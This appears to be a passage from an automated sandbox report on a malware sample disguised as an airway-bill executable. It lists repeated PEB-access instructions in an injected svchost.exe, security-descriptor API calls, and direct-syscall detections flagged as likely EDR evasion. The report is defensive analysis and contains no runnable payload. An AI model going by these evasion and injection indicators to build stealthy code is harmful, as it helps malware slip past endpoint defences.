            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF86A8 mov eax, dword ptr fs:[00000030h]2_2_02FF86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF86A8 mov eax, dword ptr fs:[00000030h]2_2_02FF86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38690 mov eax, dword ptr fs:[00000030h]2_2_02F38690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC691 mov eax, dword ptr fs:[00000030h]2_2_02FBC691
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF68C mov eax, dword ptr fs:[00000030h]2_2_02FEF68C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B781 mov eax, dword ptr fs:[00000030h]2_2_0300B781
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B781 mov eax, dword ptr fs:[00000030h]2_2_0300B781
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30670 mov eax, dword ptr fs:[00000030h]2_2_02F30670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72670 mov eax, dword ptr fs:[00000030h]2_2_02F72670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72670 mov eax, dword ptr fs:[00000030h]2_2_02F72670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F27662 mov eax, dword ptr fs:[00000030h]2_2_02F27662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F27662 mov eax, dword ptr fs:[00000030h]2_2_02F27662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F27662 mov eax, dword ptr fs:[00000030h]2_2_02F27662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43660 mov eax, dword ptr fs:[00000030h]2_2_02F43660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43660 mov eax, dword ptr fs:[00000030h]2_2_02F43660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43660 mov eax, dword ptr fs:[00000030h]2_2_02F43660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6666D mov esi, dword ptr fs:[00000030h]2_2_02F6666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6666D mov eax, dword ptr fs:[00000030h]2_2_02F6666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6666D mov eax, dword ptr fs:[00000030h]2_2_02F6666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F65654 mov eax, dword ptr fs:[00000030h]2_2_02F65654
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3965A mov eax, dword ptr fs:[00000030h]2_2_02F3965A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3965A mov eax, dword ptr fs:[00000030h]2_2_02F3965A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6265C mov eax, dword ptr fs:[00000030h]2_2_02F6265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6265C mov ecx, dword ptr fs:[00000030h]2_2_02F6265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6265C mov eax, dword ptr fs:[00000030h]2_2_02F6265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F33640 mov eax, dword ptr fs:[00000030h]2_2_02F33640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F640 mov eax, dword ptr fs:[00000030h]2_2_02F4F640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F640 mov eax, dword ptr fs:[00000030h]2_2_02F4F640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F640 mov eax, dword ptr fs:[00000030h]2_2_02F4F640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C640 mov eax, dword ptr fs:[00000030h]2_2_02F6C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C640 mov eax, dword ptr fs:[00000030h]2_2_02F6C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D64A mov eax, dword ptr fs:[00000030h]2_2_02F2D64A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D64A mov eax, dword ptr fs:[00000030h]2_2_02F2D64A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030017BC mov eax, dword ptr fs:[00000030h]2_2_030017BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30630 mov eax, dword ptr fs:[00000030h]2_2_02F30630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60630 mov eax, dword ptr fs:[00000030h]2_2_02F60630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8633 mov esi, dword ptr fs:[00000030h]2_2_02FB8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8633 mov eax, dword ptr fs:[00000030h]2_2_02FB8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8633 mov eax, dword ptr fs:[00000030h]2_2_02FB8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6F63F mov eax, dword ptr fs:[00000030h]2_2_02F6F63F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6F63F mov eax, dword ptr fs:[00000030h]2_2_02F6F63F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F37623 mov eax, dword ptr fs:[00000030h]2_2_02F37623
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD62C mov ecx, dword ptr fs:[00000030h]2_2_02FDD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD62C mov ecx, dword ptr fs:[00000030h]2_2_02FDD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD62C mov eax, dword ptr fs:[00000030h]2_2_02FDD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F35622 mov eax, dword ptr fs:[00000030h]2_2_02F35622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F35622 mov eax, dword ptr fs:[00000030h]2_2_02F35622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C620 mov eax, dword ptr fs:[00000030h]2_2_02F6C620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5D600 mov eax, dword ptr fs:[00000030h]2_2_02F5D600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5D600 mov eax, dword ptr fs:[00000030h]2_2_02F5D600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF607 mov eax, dword ptr fs:[00000030h]2_2_02FEF607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6360F mov eax, dword ptr fs:[00000030h]2_2_02F6360F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004600 mov eax, dword ptr fs:[00000030h]2_2_03004600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F377F9 mov eax, dword ptr fs:[00000030h]2_2_02F377F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F377F9 mov eax, dword ptr fs:[00000030h]2_2_02F377F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E7E0 mov eax, dword ptr fs:[00000030h]2_2_02F5E7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF7CF mov eax, dword ptr fs:[00000030h]2_2_02FEF7CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307A7 mov eax, dword ptr fs:[00000030h]2_2_02F307A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFD7A7 mov eax, dword ptr fs:[00000030h]2_2_02FFD7A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFD7A7 mov eax, dword ptr fs:[00000030h]2_2_02FFD7A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFD7A7 mov eax, dword ptr fs:[00000030h]2_2_02FFD7A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F61796 mov eax, dword ptr fs:[00000030h]2_2_02F61796
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F61796 mov eax, dword ptr fs:[00000030h]2_2_02F61796
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60774 mov eax, dword ptr fs:[00000030h]2_2_02F60774
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34779 mov eax, dword ptr fs:[00000030h]2_2_02F34779
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34779 mov eax, dword ptr fs:[00000030h]2_2_02F34779
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F42760 mov ecx, dword ptr fs:[00000030h]2_2_02F42760
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov ecx, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A750 mov eax, dword ptr fs:[00000030h]2_2_02F6A750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE750 mov eax, dword ptr fs:[00000030h]2_2_02FDE750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F63740 mov eax, dword ptr fs:[00000030h]2_2_02F63740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6174A mov eax, dword ptr fs:[00000030h]2_2_02F6174A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F59723 mov eax, dword ptr fs:[00000030h]2_2_02F59723
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3471B mov eax, dword ptr fs:[00000030h]2_2_02F3471B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3471B mov eax, dword ptr fs:[00000030h]2_2_02F3471B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF717 mov eax, dword ptr fs:[00000030h]2_2_02FEF717
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D700 mov ecx, dword ptr fs:[00000030h]2_2_02F3D700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF970B mov eax, dword ptr fs:[00000030h]2_2_02FF970B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF970B mov eax, dword ptr fs:[00000030h]2_2_02FF970B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5270D mov eax, dword ptr fs:[00000030h]2_2_02F5270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5270D mov eax, dword ptr fs:[00000030h]2_2_02F5270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5270D mov eax, dword ptr fs:[00000030h]2_2_02F5270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF4FD mov eax, dword ptr fs:[00000030h]2_2_02FEF4FD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364F0 mov eax, dword ptr fs:[00000030h]2_2_02F364F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A4F0 mov eax, dword ptr fs:[00000030h]2_2_02F6A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A4F0 mov eax, dword ptr fs:[00000030h]2_2_02F6A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F594FA mov eax, dword ptr fs:[00000030h]2_2_02F594FA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F654E0 mov eax, dword ptr fs:[00000030h]2_2_02F654E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E4EF mov eax, dword ptr fs:[00000030h]2_2_02F6E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E4EF mov eax, dword ptr fs:[00000030h]2_2_02F6E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F544D1 mov eax, dword ptr fs:[00000030h]2_2_02F544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F544D1 mov eax, dword ptr fs:[00000030h]2_2_02F544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E4BC mov eax, dword ptr fs:[00000030h]2_2_02F6E4BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F324A2 mov eax, dword ptr fs:[00000030h]2_2_02F324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F324A2 mov ecx, dword ptr fs:[00000030h]2_2_02F324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBD4A0 mov ecx, dword ptr fs:[00000030h]2_2_02FBD4A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBD4A0 mov eax, dword ptr fs:[00000030h]2_2_02FBD4A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBD4A0 mov eax, dword ptr fs:[00000030h]2_2_02FBD4A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644A8 mov eax, dword ptr fs:[00000030h]2_2_02F644A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B55F mov eax, dword ptr fs:[00000030h]2_2_0300B55F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B55F mov eax, dword ptr fs:[00000030h]2_2_0300B55F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6B490 mov eax, dword ptr fs:[00000030h]2_2_02F6B490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6B490 mov eax, dword ptr fs:[00000030h]2_2_02F6B490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC490 mov eax, dword ptr fs:[00000030h]2_2_02FBC490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30485 mov ecx, dword ptr fs:[00000030h]2_2_02F30485
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6648A mov eax, dword ptr fs:[00000030h]2_2_02F6648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6648A mov eax, dword ptr fs:[00000030h]2_2_02F6648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6648A mov eax, dword ptr fs:[00000030h]2_2_02F6648A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38470 mov eax, dword ptr fs:[00000030h]2_2_02F38470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38470 mov eax, dword ptr fs:[00000030h]2_2_02F38470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF478 mov eax, dword ptr fs:[00000030h]2_2_02FEF478
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA464 mov eax, dword ptr fs:[00000030h]2_2_02FFA464
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6D450 mov eax, dword ptr fs:[00000030h]2_2_02F6D450
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6D450 mov eax, dword ptr fs:[00000030h]2_2_02F6D450
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D454 mov eax, dword ptr fs:[00000030h]2_2_02F3D454
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D454 mov eax, dword ptr fs:[00000030h]2_2_02F3D454
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D454 mov eax, dword ptr fs:[00000030h]2_2_02F3D454
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D454 mov eax, dword ptr fs:[00000030h]2_2_02F3D454
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D454 mov eax, dword ptr fs:[00000030h]2_2_02F3D454
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D454 mov eax, dword ptr fs:[00000030h]2_2_02F3D454
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E45E mov eax, dword ptr fs:[00000030h]2_2_02F5E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E45E mov eax, dword ptr fs:[00000030h]2_2_02F5E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E45E mov eax, dword ptr fs:[00000030h]2_2_02F5E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E45E mov eax, dword ptr fs:[00000030h]2_2_02F5E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E45E mov eax, dword ptr fs:[00000030h]2_2_02F5E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40445 mov eax, dword ptr fs:[00000030h]2_2_02F40445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40445 mov eax, dword ptr fs:[00000030h]2_2_02F40445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40445 mov eax, dword ptr fs:[00000030h]2_2_02F40445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40445 mov eax, dword ptr fs:[00000030h]2_2_02F40445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40445 mov eax, dword ptr fs:[00000030h]2_2_02F40445
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40445 mov eax, dword ptr fs:[00000030h]2_2_02F40445
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004581F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004581F7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042A364 SetUnhandledExceptionFilter,0_2_0042A364
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A395

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtSetInformationThread: Direct from: 0x779D6319Jump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtQueryInformationToken: Direct from: 0x779E2BCCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtOpenFile: Direct from: 0x779E2CECJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtNotifyChangeKey: Direct from: 0x779E3B4CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtCreateFile: Direct from: 0x779E2F0CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtAllocateVirtualMemory: Direct from: 0x779E2B0CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtOpenSection: Direct from: 0x779E2D2CJump to behavior
